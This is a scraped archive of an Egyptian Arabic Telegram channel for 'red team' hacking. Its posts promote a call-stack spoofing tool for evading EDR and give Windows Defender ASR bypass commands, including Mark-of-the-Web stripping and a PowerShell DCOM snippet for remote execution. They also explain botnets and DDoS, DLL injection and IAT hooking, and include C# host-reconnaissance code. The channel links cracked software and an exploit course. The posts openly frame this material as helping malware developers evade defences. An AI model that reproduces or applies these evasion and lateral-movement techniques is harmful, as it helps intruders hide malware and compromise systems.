ru
Feedback
RED TEAM CYBERSECURITY-SM🇪🇬

RED TEAM CYBERSECURITY-SM🇪🇬

Открыть в Telegram

Trust no one in the world, no matter what. Here you will learn cybersecurity, development, software, and programming completely free of charge. I don't require any fees except for paid products and courses. Egypt 🔥🇪🇬

Больше
1 153
Подписчики
-824 часа
+137 дней
+1330 день
Архив постов
مشروع CallStackSpoofer الموجود على GitHub هو أداة متخصصة في التلاعب بالـ Call Stack الخاص بالتطبيقات أثناء تشغيلها وهو جزء مه
مشروع CallStackSpoofer الموجود على GitHub هو أداة متخصصة في التلاعب بالـ Call Stack الخاص بالتطبيقات أثناء تشغيلها وهو جزء مهم جدًا لأي هكر سواء وايت هات أو بلاك هات وخصوصًا عندما نتكلم عن الهجمات المتقدمة زي APT الهجمات دي تعتمد على البقاء مختفيًا أطول فترة ممكنة داخل النظام والابتعاد عن أعين الـ EDR أو أنظمة كشف التهديدات الحديثة الفكرة الرئيسية للأداة هي أنها بتوفر إمكانية تعديل وإخفاء مسارات الاستدعاء Call Stack بحيث تجعل تتبع النشاط الضار أو تحليل البرامج الضارة أصعب بكتير على المحللين الأمنيين أو الأنظمة الدفاعية ولو حبينا نبسط ده فالأداة بتشتغل على التلاعب بمسارات الأكواد اللي بتشتغل داخل النظام بحيث لو حد حاول يحلل الأداة أو العملية الخبيثة اللي شغالة مش هيقدر يكتشف مكانها بسهولة الأداة بتشتغل بشكل أساسي من خلال استغلال قدرة البرامج على التحكم في مسار التشغيل runtime execution flow وده من خلال تقنيات زي الـ ROP Ret2Libc أو أي تقنيات مشابهة الهدف الأساسي هنا هو إنه يكون عندك قدرة إنك تبني كود خبيث ومش يظهر في أي تحليل إنه خبيث يعني لو حد بيراقب النظام مش هيشوف النشاط ده في الـ Logs أو في الأدوات اللي بتحلل المسارات لو بنتكلم عن بلاك هات هكر وفايدة الأداة بالنسبة لهم فهي هتكون أداة قوية جدًا عشان يدمجها في أي حملة اختراق متقدمة على سبيل المثال لو هنتكلم عن استغلال الثغرات Exploits اللي بتحتاج تحكم كامل في النظام الأداة دي ممكن تساعد في جعل التحليل الجنائي شبه مستحيل لأن مسارات الاستدعاء Call Stack كلها متغيرة ولو حد حاول يعمل Debugging أو حتى يقرأ معلومات من الـ Memory مش هيلاقي حاجة واضحة الفكرة هنا إنك بتخلق مستوى من الغموض حول العملية اللي شغالة كأنك بتمحي بصمتك من ناحية الأفكار اللي ممكن يضيفها البلاك هات على المشروع ممكن مثلًا يدمج تقنيات زي الـ Process Hollowing أو الـ DLL Injection مع الأداة بحيث تشتغل بشكل غير مباشر في النظام يعني بدل ما يكون فيه عملية وحدة مسؤولة عن كل حاجة الأداة ممكن تشتغل كجزء صغير داخل كذا عملية منفصلة وده هيزود التمويه أكتر كمان يمكن استخدام الأداة لتطبيق هجمات متقدمة زي الـ Thread Hijacking اللي بتسمح لك تسيطر على ثريد شغال بالفعل وتعدل مساره بدون ما النظام يحس لما نتكلم عن هجمات APT Advanced Persistent Threat فاستخدام الأداة بيكون محورى لإنها بتديك قدرة إنك تفضل داخل النظام لفترة طويلة بدون كشفك يعني ممكن تستخدمها في جمع البيانات الحساسة زي كلمات المرور أو بيانات الشبكة لفترة طويلة بدون ما أي حد يلاحظ ولو عايز تطورها أكتر ممكن تضيف لها قدرة تحليل تلقائي للسيرفرات اللي بتهاجمها بحيث تتعرف الأداة تلقائيًا على البرامج اللي شغالة فيها وتعدل Call Stack الخاص بها بناءً على طبيعة البرنامج المستهدف أي حد بيستخدم الأداة سواء في الاختراق أو الحماية محتاج يكون فاهم كويس جدًا إن تقنيات زي دي بتخلي التحليل العكسي عملية صعبة لكن مش مستحيلة لأن في تقنيات حديثة زي الـ AI-Based Threat Detection اللي بتشتغل على تحليل السلوك Behavior Analysis مش مجرد تحليل الأكواد والـ Call Stack وده بيخلي الحاجة لتطوير الأداة بشكل مستمر أمر مهم عشان تفضل خطوة قدام أنظمة الحماية رابط المشروع على git hub https://github.com/WithSecureLabs/CallStackSpoofer لمزيد من المعلومات عن الموضوع وبس والله 😊

تحليل وتقنيات تجاوز قواعد ASR في Windows Defender تقليل سطح الهجوم (ASR) هو ميزة قدمتها مايكروسوفت كجزء من Windows Defender E
تحليل وتقنيات تجاوز قواعد ASR في Windows Defender تقليل سطح الهجوم (ASR) هو ميزة قدمتها مايكروسوفت كجزء من Windows Defender Exploit Guard. هي عبارة عن مجموعة قواعد قابلة للتعديل لمنع الإجراءات اللي بتستخدمها البرمجيات الضارة عشان تستغل الأجهزة، زي منع تطبيقات Office من إنشاء عمليات فرعية أو محتوى قابل للتنفيذ. تقنيات التجاوز الرئيسية 1. منع جميع تطبيقات Office من إنشاء عمليات فرعية - قاعدة التفعيل: القاعدة دي بتمنع تطبيقات Office من إنشاء عمليات فرعية، وهو أسلوب شائع بتستخدمه البرمجيات الضارة. - تجاوز جزئي: واحدة من الطرق لتجاوز القاعدة دي جزئيًا هي استخدام ماكرو Office اللي مش بيعمل عملية فرعية بشكل مباشر، لكن بيستخدم وسائل تانية لتحقيق نفس النتيجة. - تجاوز كامل: استخدام أدوات زي macro_pack اللي بتقدر تولد وتخفي الحمولة البرمجية، وده بيسمح بإنشاء مستندات Office تقدر تتجاوز القاعدة دي تمامًا باستخدام مسارات تنفيذ بديلة زي كائنات DCOM. 2. منع تطبيقات Office من إنشاء محتوى قابل للتنفيذ - قاعدة التفعيل: القاعدة دي بتمنع تطبيقات Office من إنشاء ملفات قابلة للتنفيذ. - تجاوز القاعدة: ممكن تتجاوز القاعدة دي باستخدام تقنيات التنفيذ في الذاكرة، اللي بتنفذ الحمولة البرمجية مباشرة في الذاكرة من غير ما تكتب على القرص. 3. منع استدعاءات Win32 API من ماكرو Office - قاعدة التفعيل: القاعدة دي بتمنع الماكرو من عمل استدعاءات Win32 API، اللي بتستخدم عادة لتنفيذ أفعال خبيثة. - تجاوز القاعدة: ممكن تتجاوز القاعدة دي باستخدام تقنيات التمويه واستدعاءات API البديلة، واستخدام تنفيذ الكود الديناميكي زي PowerShell. 4. منع JavaScript أو VBScript من تشغيل محتوى قابل للتنفيذ تم تحميله - قاعدة التفعيل: القاعدة دي بتمنع السكريبتات من تشغيل الملفات التنفيذية اللي تم تحميلها من الإنترنت. - تجاوز القاعدة: إزالة علامة البيانات البديلة (ADS) اللي بتحدد إن الملف تم تحميله من الإنترنت ممكن يتجاوز القاعدة دي، وده ممكن يتم باستخدام أوامر زي:
    move file_path %temp%\tmpfile.dat
     type %temp%\tmpfile.dat > file_path
     del %temp%\tmpfile.dat
   
5. منع تنفيذ السكريبتات المموهة المحتملة - قاعدة التفعيل: القاعدة دي بتمنع السكريبتات اللي بتبدو مموهة. - تجاوز القاعدة: التجارب أظهرت إن تقنيات التمويه الأساسية مش بتفعل القاعدة دي بانتظام، وده معناه إن الميزة دي ممكن تكون مش كاملة. استخدام تقنيات تمويه أو تعبئة متقدمة ممكن يساعد في تجاوز القاعدة دي. 6. منع العمليات غير الموثوقة وغير الموقعة من التشغيل من USB - قاعدة التفعيل: القاعدة دي بتمنع تشغيل العمليات غير الموثوقة وغير الموقعة من الفلاشات. - تجاوز القاعدة: ممكن توليد حمولات باستخدام أدوات زي macro_pack وتشغيلها من الفلاشة من غير ما تتفعل قاعدة ASR، خصوصًا لو الحمولات دي مش بتعتمد على صيغ تنفيذية تقليدية لكن بتستخدم سكريبتات أو أشكال أخرى من الأتمتة. 7. منع إنشاء العمليات من أوامر PsExec و WMI - قاعدة التفعيل: القاعدة دي بتمنع إنشاء العمليات من PsExec و WMI، اللي بتستخدم عادة للتنقل الجانبي. - تجاوز القاعدة للتنقل الجانبي: استخدام أساليب بديلة زي استخدام كائنات DCOM للتنقل الجانبي ممكن يتجاوز القاعدة دي. مثلا، استخدام كائن ShellBrowserWindow DCOM ممكن يسمح بتنفيذ أوامر على الأنظمة البعيدة من غير تفعيل ASR:
     $com = [Type]::GetTypeFromCLSID('c08afd90-f2a1-11d1-8455-00a0c91f3880', '192.168.5.12')
     $obj = [System.Activator]::CreateInstance($com)
     $obj.Document.Application.ShellExecute("calc.exe")
مع إن قواعد ASR بتوفر طبقة دفاع قوية ضد الكثير من أساليب الهجوم الشائعة، الوثيقة دي بتوضح بعض الأساليب والتقنيات اللي ممكن يستخدمها المهاجمين لتجاوز الدفاعات دي. فهم التقنيات دي ضروري لكل من محترفي الأمن الهجومي اللي بيطوروا برمجيات ضارة ومحترفي الأمن الدفاعي اللي بيحاولوا يعززوا موقف الأمن بتاع الأنظمة. اتمنا تكونو استفدتو ♥ وبس واالله😊

الكود ده بيتكلم عن دالة مكتوبة بلغة الاسمبلي في بيئة 64 بت وبتوضح ازاي تتعامل مع Parameters وقت استدعاء الدوال طبقاً لتواغبقك الاستدعاء المستخدمة في الأنظمة الحديثة زي ويندوز أو لينكس حيث يتم التعامل مع أول أربع Parameters للدالة باستخدام الريجيسترات RCX وRDX وR8 وR9 و قتها بيتم وضع باقي Parameters على الستاك وقت تنفيذ التعليمات بحيث يتم تحديد موقع كل Parameter عن طريق Offset بالنسبة للبوينتر RSP اللي هو مؤشر الستاك في وقت الاستدعاء ويظهر الكود بشكل واضح أن الـ Parameters الإضافية بتتواجد على الستاك مع وجود منطقة محجوزة تُسمى Shadow Space وهي عبارة عن مساحة مخصصة قبل تخزين الـParameters على الستاك ودي بتكون جزء من تنظيم الميموري اللي بيفرضه الويندوز API الكود بيبدأ بتسمية الدالة "AsmFunc11Parms PROC" اللي هدفها الأساسي هو التعامل مع 11 Parameter حيث أول أربع Parameters بتكون موجودة في الريجيسترات المذكورة سابقاً بينما Parameters الخامسة والسادسة وما بعدها بتكون موجودة على الستاك عند Offsets محددة من RSP فمثلاً Parameter الخامسة موجودة عند Offset RSP+40 وParameter السادسة عند RSP+48 وبكده يتم الوصول للقيم دي من تعليمات زي MOV اللي بتقوم بنقل الداتا من الميموري إلى الريجيستر RAX بهدف استخدامها جوه الدالة تعليمة MOV زي "MOV RAX, qword ptr [RSP + 40]" بتوضح بشكل صريح إن النظام بيقوم بتحميل القيمة الموجودة عند الإزاحة المحددة من الستاك إلى الريجيستر RAX وده بيديك القدرة على التعامل مع القيم مباشرة داخل الكود والدالة بتنتهي بتعليمة RET اللي بتعيد التحكم للكود اللي استدعى الدالة وده بيظهر أهمية تنظيم الذاكرة خلال عملية تنفيذ الكود عشان نفهم أهمية الكود نركز على نقاط أساسية مثل كيفية استغلال توزيع المعلمات على الستاك خاصة في استدعاءات النظام Syscalls أو الدوال الخاصة بـAPI اللي بتحتاج معلمات كتير ده لأن أي خلل في ترتيب المعلمات أو تحديد مكانها بشكل خاطئ هيؤدي لنتائج غير متوقعة زي الكراش أو تنفيذ أوامر غير صحيحة كمان في سيناريوهات زي Buffer Overflow اللي بيتم فيها حقن تعليمات ضارة أو بيانات معينة في الستاك لفهم كيفية تخطي الحمايات أو السيطرة على مسار التنفيذ هنا بيظهر أهمية معرفة تفاصيل زي توزيع Parameters و Offsets الدقيقة في تقنيات زي ROP اللي هي Return Oriented Programming اللي بتُستخدم لتجاوز الحمايات زي DEP أو ASLR لازم تبقى فاهم كويس جداً كيفية التعامل مع الريجيسترات والستاك لأنك حرفياً بتعيد ترتيب التعليمات اللي موجودة في البرنامج عشان تنفذ أوامر معينة وبتحتاج تتحكم في Parameters بدقة لإنجاح الـ EXPLOITده كمان فهمك للـShadow Space اللي هو جزء مهم من تنظيم الذاكرة بيساعدك تبني استغلالات أكتر تعقيداً خاصة إنه بيتم استخدامه بشكل أساسي لتخزين مؤقت للمعلمات الموجودة في الريجيسترات أثناء تنفيذ الدالة لو حبينا نتكلم عن السيناريوهات العملية أكتر هنلاقي إن كتابة المالوير اللي بيتعامل مع استدعاءات النظام بشكل مباشر بيحتاج الفهم العميق للتوزيع ده لأن استدعاء أي دالة في النواة Kernel مثلاً بيستلزم تمرير Parameters بشكل صحيح سواء في الريجيسترات أو الستاك بالإضافة إن التعامل مع استدعاءات معقدة زي ZwQuerySystemInformation اللي بتحتاج كمية كبيرة من Parameters بيتطلب منك تحضير الستاك بشكل صحيح عشان التنفيذ يتم بدون مشاكل اتفاقية الاستدعاء بتختلف حسب البيئة فلو بنتكلم عن linux environment بنلاقي إن التوزيع بيكون مشابه لكن مع تغييرات طفيفة في ترتيب الريجيسترات أو Offsets ولو دخلنا في بيئات متقدمة زي Visual Studio ممكن تلاقي حاجات مختلفة زي fastcall أو stdcall ودي بتغير كيفية تمرير الـ Parameters بين الريجيسترات والستاك وهنا تظهر الحاجة لفهم التفاصيل الدقيقة دي عند بناء برامج منخفضة المستوى أو استغلالات متقدمة الكود ده مش مجرد مثال على التعامل مع المعلمات لكنه بيوضح أهمية معرفة التفاصيل الدقيقة في تنظيم الذاكرة أثناء تنفيذ التعليمات وبيبرز أهمية فهم المعمارية دي لأي هاكر أو مطور مالوير محترف لأنك كل ما عرفت أكتر عن العمليات اللي بتحصل في الخلفية كل ما قدرت تبني استغلالات أو أدوات أكتر تعقيداً وكفاءة

photo content

الورقة دي بتشرح ازاي تقدر تتفادى وتخطي القوانين اللي بتحطها مايكروسوفت في Windows Defender، وبالتحديد Attack Surface Reduction (ASR). ASR دي مجموعة من القوانين اللي بتحد من السطح الهجومي للنظام وبتمنع التطبيقات والأفعال اللي غالباً بيستخدمها الهاكرز لاختراق الأجهزة. القوانين دي، زي "منع تطبيقات الأوفيس من إنشاء عمليات فرعية" أو "منع تطبيقات الأوفيس من إنشاء محتوى تنفيذي"، بتساعد جداً في تقليل الهجمات اللي بتيجي من الماكروهات أو السكريبتات الخبيثة اللي بتستخدم الأوفيس. في الورقة دي، بيتشرح بالتفصيل ازاي القوانين دي بتشتغل وازاي ممكن تتفاداها باستخدام تقنيات معينة. على سبيل المثال، قانون "منع تطبيقات الأوفيس من إنشاء عمليات فرعية" بيمنع الماكروهات الخبيثة في الأوفيس من تشغيل برامج تانية، لكن ممكن تتفاداه باستخدام مثلاً الـTask Scheduler لتشغيل البرامج بدلاً من الأوفيس مباشرة. كمان، ممكن تستخدم كائنات COM زي ShellWindows أو ShellBrowserWindow لتشغيل الأوامر دي بدون ما تتعارض مع القوانين دي. لما نيجي للقوانين اللي بتمنع الأوفيس من إنشاء محتوى تنفيذي، بتقدر تتخطاها برده عن طريق تنزيل الملف بامتداد مختلف زي .txt وبعدين تغير الامتداد ده لامتداد تنفيذي زي .exe بعد ما ينزل. فيما يتعلق بالقوانين اللي بتمنع استدعاء واجهات برمجة التطبيقات Win32 من الماكروهات في الأوفيس، القوانين دي ممكن تتخطاها عن طريق تحميل الـDLL اللي محتاجه في نفس الدليل بتاع الماكرو وتغيير الدليل الحالي للماكرو للدليل ده. القوانين دي، بالرغم من إنها قوية، لكنها بتعتمد على وجود قيود معينة زي الامتدادات أو أسماء الـDLL، وده بيخليها قابلة للتخطي بالطرق دي. بالنسبة لأي هاكر، الفهم العميق للقوانين دي وطرق تخطيها بيساعد في تطوير برمجيات خبيثة تقدر تتفادى الكشف وتنفذ الهجمات بنجاح. تطوير الماكروهات الخبيثة باستخدام التقنيات دي بيضمن إن الهجمات تفضل فعالة حتى مع وجود القوانين الصارمة دي. المستند ده يعتبر دليل شامل لأي هاكر عايز يطور برمجيات خبيثة ويقدر يتخطى أنظمة الحماية المتقدمة زي Windows Defender وASR. استخدام التقنيات المشروحة فيه بيساعد على تعزيز فعالية البرمجيات الخبيثة وضمان إنها تقدر تعدي من الفلاتر والقوانين اللي بتحطها أنظمة الحماية.

بســـــــــــــم الله الرحمن الحيـــــــم المقدمة: ملاحظة هامة: من المهم أن نؤكد على أن استخدام البوت نت أو القيام بهجوم DDoS
بســـــــــــــم الله الرحمن الحيـــــــم المقدمة: ملاحظة هامة: من المهم أن نؤكد على أن استخدام البوت نت أو القيام بهجوم DDoS هو غير قانوني تمامًا في جميع أنحاء العالم هذا النوع من الأنشطة يعرضك للمسائلة القانونية وقد يؤدي إلى السجن أو غرامات مالية ضخمة. ما سأقدمه هو شرح تعليمي فقط لفهم كيفية عمل هذه الأنواع من الهجمات وكيفية الحماية منها. هذا الشرح ليس بغرض تحفيز أي نشاط غير قانوني. وانا لست مسؤالا عن اي استخدام خطأ وخليني ابدأ 1. ما هو البوت نت؟ البوت نت هو شبكة من الأجهزة المصابة (حواسب، هواتف ذكية، سيرفرات، أجهزة متصلة بالإنترنت) ال بيسيطر عليها الهكر او شخص آخر باستخدام برمجيات خبيثة (فيروسات، تروجان، برامج رانسوم وير). الأجهزة المصابة تصبح جزءًا من شبكة ضخمة يمكن استخدامها لأغراض متعددة مثل الهجمات الإلكترونية أو التعدين أو إرسال رسائل مزعجة بمعني سبام. والله يا زعيم عاوزين توضيح اكثر - حاضر خليني اديك امثله أمثلة: لو قمت او قمتي بتحميل برنامج غير موثوق أو فتحته من مصدر مجهول كل ال هيحصل يا معلم جهازك هيتصاب بفيرس وهيبقا جزء من شبكه البوت نت. التطبيقات غير الموثوقة او الرشق او الهكر او اختراق واي فاي وغيرها كذبه والهواتف بتحتوي على برامج خبيثة تحول الهاتف إلى جزء من الشبكة. (بوت نت) فهمنا يا زعيم طيب ازاي بنعمل احنا ده او بنجيب بوت نت منين؟ - حاضر ركز معيا 2. كيفية الحصول على البوت نت؟ يمكن الحصول على البوت نت بطريقتين أساسيتين: مجانية أو مدفوعة. خليني اتكلم ع المجاني الاول أ. البوت نت المجاني: المصادر المفتوحة: أدوات مفتوحة المصدر مثل Mirai Botnet تم نشرها على GitHub أو منتديات الأمن السيبراني. هجمات الفدية أو البرمجيات الخبيثة: يمكن أن تصيب الأجهزة عبر تحميل برامج أو فتح اشياء تحتوي على برمجيات خبيثة. مثل ملفات برامج مواقع وغيرها البوت نت المدفوع بقا: في الانتر نت المظلم (Dark Web) يمكن شراء بوت نت جاهز يتكون من مئات أو آلاف الأجهزة القادرة على تنفيذ هجمات ضخمة ومتسالنيش ازاي. 3. كيفية دمج الأجهزة في البوت نت بعد إصابة الأجهزة بالبرمجيات الخبيثة يقوم القراصنة بدمجها في شبكة البوت نت عبر الخطوات التالية: الإصابة بالبرمجيات الخبيثة: الفيروسات والتروجان هي البرامج التي تحول الجهاز إلى بوت. وضح اكثر يا زعيم مش فاهمين؟ مثال: إذا قام شخص بفتح ملف مرفق في بريد إلكتروني يحتوي على فيروس بمجرد فتح الملف يتم تحميل البرنامج الخبيث بدون علمك يا معلم. ثم الاتصال بسيرفر التحكم (C&C Server): بعد الإصابة يتصل الجهاز بسيرفر خاص يتلقى منه أوامر من القراصنة وبعدها الهكر بيرسل الأوامر للأجهزة المصابة: من خلال سيرفر التحكم بيتم إرسال الأوامر إلى الأجهزة المصابة لتنفيذ الأنشطة المطلوبة مثل بدء هجوم DDoS. 4. كيفية تنظيم هجوم DDoS باستخدام البوت نت؟ خليني اشرحلك الاول ايه DDos اصلا لو متعرفش بص يا سيدي هجوم DDoS هو هجوم يتم فيه إرسال عدد ضخم من الطلبات إلى موقع ويب أو سيرفر بهدف إغراقه وإيقافه الفكرة هي أن السيرفر لا يستطيع معالجة كل هذه الطلبات في وقت واحد وده بيخالي السيرفر ميستحملش ويقف بسهوله. الشخص او الهكر المسيطر ع الشبكه بتكون موحودن عبر سيرفر فبيرسل للسيرفر الطلبات ال بتخالي الاجهزه تهجم معاه بدون اذن المالك ده طبعا ما الفيرس داخل جهازك وانت بقيت جزء من الشبكه الهكر يوجهون الأجهزة المصابة لإرسال طلبات ضخمة للموقع المستهدف او السيرفر المستهدف يبدأ كل جهاز مصاب في إرسال طلبات ضخمة للموقع المستهدف مما يتسبب في توقف السيرفر او الموقع المستهدف طيب يا زعيم لو انا عندي موقع وتعرض للهجوم ده ايه ال هيحصل؟ بص يا سيدي لو تعرض موقعك لهجوم DDoS باستخدام شبكة بوت نت فهيتم إرسال طلبات HTTP أو طلبات ضخمة إلى الموقع وده هيتسبب لأقاف موقعك تعال بقا اقولك الموضوع ده اتطور ازاي وازاي اتصد لها تطور هجمات DDoS زمان كانت هجمات DDoS تعد واحدة من أخطر أنواع الهجمات الإلكترونية وكانت تركز على إرسال كمية ضخمة من الطلبات حتى يعجز السيرفر عن معالجتها لكن مع تطور التكنولوجيا فبقا في تطور بلاجهزه واشياء للتصدي للهجوم يا زعيم طيب ازاي بيتم التصدي ليها؟ بص يا معلم شبكات CDN تعمل على توزيع حركة المرور على عدة سيرفرات في أماكن جغرافية مختلفة وده بيقلل الضغط شويه ع الموقع او السيرفر بمعني لو تعرض سيرفر لهجوم يمكن توزيع الطلبات على سيرفرات متعددة حول العالم. وغير كدا في كمان جدران الحماية للتطبيقات (WAF)

↔️ خليني بقا اكتبلك شرح كامل عن البوت نت والشبكه وحجب الخدمه DDos والاستغلال وكل ال في بالك ↔️

Introduction to ExploitZero-Day Discovery and Development.rar2390.09 MB

يلا ننزل بالتقيل dll injector: ما هو dll .. dll هو ملف بتكتبه ب c او c++ او اي لغه و بيكون لل dll , entry point يعني مكان البيتنفذ اول ما ال dll يشتغل زي ال main في c و عشان تشغله لازم تعمل load ل LoadLibrary في الميموري و تحط في الميموري مكان ملف ال dll عشان يشتغل و دي وظيفت ال dll injector انه بيحط ال dll في اي بروسيس شغاله و ينفذ الاوامر في البروسيس IAT lookup IAT (import address table) هو عباره عن معلومات موجود في idata section بيكون فيها معلومات عن ال dlls الشغاله في البروسيس و الفانكشنز المستخدمه من ال dlls طبعا ليه افاده كبيره في اكتشاف الثغرات لل IAT hooking او لكشف ال برامج الخبيثه IAT hooking تستخدم ال IAT في تعديل علي فانكشن معينه عشان تنفذ مهمه تانيه مثلا باستخدام IAT lookup عشان تشوف او فانكشن زي MessageBoxA موجوده و لو موجوده بتعدل عليها عشان نفهم اكتر نبص علي الفانكشن MessageBoxA(NULL, "title", "text", MB_OK) ده مثال لاستخدام الفانكشن و باستخدام الهوكنج ممكن تعدل عليها و تخليها MessageBoxA(NULL, "hooked", "hacked", MB_OK)

الكورس ده هيعلمك ازاي تعمل حاجات مثل هذا الكود 😊

using System;
using System.Diagnostics;
using System.Net;

namespace RedTeamDevelop
{
    class GeneralInfo
    {
      public string oSystem; 
        public string uName; 
        public string cDirectory; 
        public string pName; 
        public string ePath; 
        public string ipv4address; 
        public string hostName;
        public int pId;
        public bool isAdmin;

        public GeneralInfo(){

            oSystem = Environment.OSVersion.ToString();
            uName = Environment.UserName;
            cDirectory = Environment.CurrentDirectory;
            pName = Process.GetCurrentProcess().ProcessName;
            pId = Process.GetCurrentProcess().Id;
            ePath = Process.GetCurrentProcess().MainModule.FileName;
            hostName = Dns.GetHostName();
            ipv4address = Dns.GetHostByName(hostName).AddressList[1].ToString();
            using var identity = System.Security.Principal.WindowsIdentity.GetCurrent();
            var principal = new System.Security.Principal.WindowsPrincipal(identity);
            isAdmin = principal.IsInRole(System.Security.Principal.WindowsBuiltInRole.Administrator);
        }
    }
}
الكود ده مكتوب بلغة C وهو ببساطة بيجمع معلومات عن النظام اللي شغال عليه يعني لو الهكر استخدم الكود ده ضمن أداة خبيثة أو سكربت، هيقدر يلم شوية معلومات أساسية عن الجهاز اللي شغال عليه الكود الكود يا رجالة بيعمل الاتي : نوع نظام التشغيل (OS): بيعرف نظام التشغيل اللي الجهاز شغال عليه (Windows مثلاً). اسم المستخدم: بيعرض اسم المستخدم اللي عامل تسجيل دخول. الدليل الحالي: بيحدد المسار اللي الكود شغال منه. اسم العملية (Process): بيعرض اسم البرنامج أو العملية اللي بتشغل الكود. رقم العملية (PID): رقم مميز للعملية. مسار التشغيل (Executable Path): المسار الكامل لملف التنفيذ. الـ IP المحلي: بيسحب عنوان الـ IPv4 الخاص بالجهاز. اسم الجهاز: بيجيب اسم الجهاز (Host Name). صلاحيات الأدمن: بيشوف هل المستخدم عنده صلاحيات أدمن ولا لا.

موقع PayloadHub.com بيقدم مكتبة متطورة من الـpayloads اللي اتطورت بواسطة مجتمع الهاكرز لاستخدامها مع أجهزة Hak5 زي USB Rubber
موقع PayloadHub.com بيقدم مكتبة متطورة من الـpayloads اللي اتطورت بواسطة مجتمع الهاكرز لاستخدامها مع أجهزة Hak5 زي USB Rubber Ducky وBash Bunny وPacket Squirrel وLAN Turtle وShark Jack وKey Croc الموقع ده بيتيح للمستخدمين استكشاف وتحميل الـpayloads دي، وكمان بيشجعهم على تطوير ومشاركة الـpayloads الخاصة بيهم من خلال أدوات زي PayloadStudio، اللي هو محرر على الويب بيسمح بتطوير الـpayloads بشكل إبداعي من بين الـpayloads المتاحة، فيه مثلاً "Execute commands as NT AUTHORITY\SYSTEM with TrustedInstaller privileges" اللي بيسمح بتنفيذ أوامر بصلاحيات عالية على نظام ويندوز باستخدام USB Rubber Ducky كمان فيه "TCPDump" اللي بيستخدم مع Packet Squirrel لالتقاط وتحليل حركة المرور على الشبكة الموقع كمان بيقدم سلسلة من الفيديوهات التعليمية زي "[PAYLOAD] SERIES" اللي بيستضيفها فريق Hak5 وبيستعرضوا فيها التقنيات والكود اللي بيخلي الـpayloads فعّالة بالإضافة لكده، الموقع بينظم جوائز للـpayloads المميزة، وده بيشجع على الابتكار والمشاركة داخل مجتمع الهاكرز من خلال الموقع، المستخدمين بيقدروا يساهموا بالـpayloads بتاعتهم عن طريق تقديمها في مستودعات GitHub الخاصة بـHak5، وده بيساعد في توسيع قاعدة المعرفة وتبادل الخبرات بين الأعضاء الموقع كمان بيقدم تحذيرات بخصوص استخدام الـpayloads دي، وبيشدد على إنها مخصصة للأغراض التعليمية واختبارات الأمان المصرح بيها فقط، وبيحذر من الاستخدام غير القانوني أو غير المصرح بيه في النهاية، PayloadHub.com بيعتبر مصدر قيم لأي شخص مهتم بمجال السايبر سيكيوريتي وعاوز يطور مهاراته في تطوير واستخدام الـpayloads مع أجهزة Hak5 المختلفة رابط الموقع https://payloadhub.com/blogs/payloads

أداة HCL AppScan Standard اللي هي واحدة من أقوى الأدوات اللي بيستخدمها الهكرز المحترفين ومحللي الأمان في اكتشاف الثغرات الأمن
أداة HCL AppScan Standard اللي هي واحدة من أقوى الأدوات اللي بيستخدمها الهكرز المحترفين ومحللي الأمان في اكتشاف الثغرات الأمنية في التطبيقات الويب والأداة دي بتشتغل على تحليل التطبيقات بشكل ديناميكي وساكن وتقدر من خلالها تكتشف الثغرات زي SQL Injection وXSS وCSRF وغيرها بشكل سريع وفعال وفكرة عمل الأداة مبنية على إنها بتمسح الكود والمحتوى بتاع التطبيق وبتحاكي التفاعلات اللي ممكن المستخدم يعملها مع التطبيق وده بيساعد في اكتشاف الثغرات اللي ممكن تتسبب في اختراق النظام وتعرض البيانات للخطر كمان الأداة بتستخدم تقنيات الذكاء الصناعي والتعلم الآلي عشان تحسن من عملية اكتشاف الثغرات وتقلل من نسبة النتائج الكاذبة اللي ممكن تظهر ومن الحاجات المهمة في الأداة إنها بتدعم التكامل مع بيئات التطوير المختلفة زي Jenkins وMaven وEclipse وده بيسهل على المطورين إنهم يدمجوا الأداة في دورة حياة التطوير بشكل تلقائي ويكتشفوا الثغرات أول بأول طيب دلوقتي إزاي الهكرز ممكن يستفيدوا من الأداة دي في اختراق الأنظمة وإزاي ممكن يستخدموها بشكل غير مشروع أول حاجة الهكرز ممكن يستخدموا الأداة في إجراء تحليل شامل للتطبيقات الويب اللي عايزين يخترقوها وده هيديهم فكرة واضحة عن كل الثغرات الموجودة في التطبيق وبالتالي يقدروا يحددوا الثغرات اللي ممكن يستغلوها بأقل مجهود وبأسرع وقت وتاني حاجة الأداة بتوفر تقارير مفصلة جدًا عن كل ثغرة بتكتشفها التقارير دي بتحتوي على معلومات عن مكان الثغرة وأزاي ممكن تستغلها وده بيسهل على الهكرز إنهم يخططوا للهجوم بشكل دقيق وبدون أي تخبط ومن المميزات اللي بتميز الأداة إنها بتدعم الفحص اليدوي وده يعني إن الهكر يقدر يتدخل بنفسه ويعدل في إعدادات الفحص أو يركز على أجزاء معينة من التطبيق اللي هو عايز يستهدفها بشكل خاص وده بيدي الهكرز مرونة كبيرة في تحليل التطبيقات واستهداف الثغرات اللي ممكن تكون مش واضحة بشكل مباشر للأنظمة التلقائية زي HCL AppScan Standard دي أداة قوية جدًا سواء كنت هكر أو محلل أمان الأداة دي هتديك القوة والتحليل العميق اللي محتاجه عشان تكتشف الثغرات وتستغلها بشكل فعال وفي النهاية لازم تفهم إن الأداة دي زي ما هي مفيدة لحماية الأنظمة هي كمان خطيرة جدًا لو وقعت في إيد الشخص الغلط لأنه ممكن يستخدمها لإلحاق ضرر كبير بأي تطبيق ويب مش مؤمن كويس وده يوضح قد إيه أهمية إنك تبقى عارف إزاي تستخدم الأدوات دي بشكل صحيح سواء كنت هتستخدمها للدفاع عن الأنظمة أو للهجوم عليها رابط الأداة https://www.dr-farfar.com/hcl-appscan-standard/ وبس والله 😊

الكيرنل هو الجزء الأساسي والمحوري في نظام التشغيل وبيعتبر كأنه العقل المدبر أو القلب النابض للنظام هو المسؤول عن إدارة كل حاج
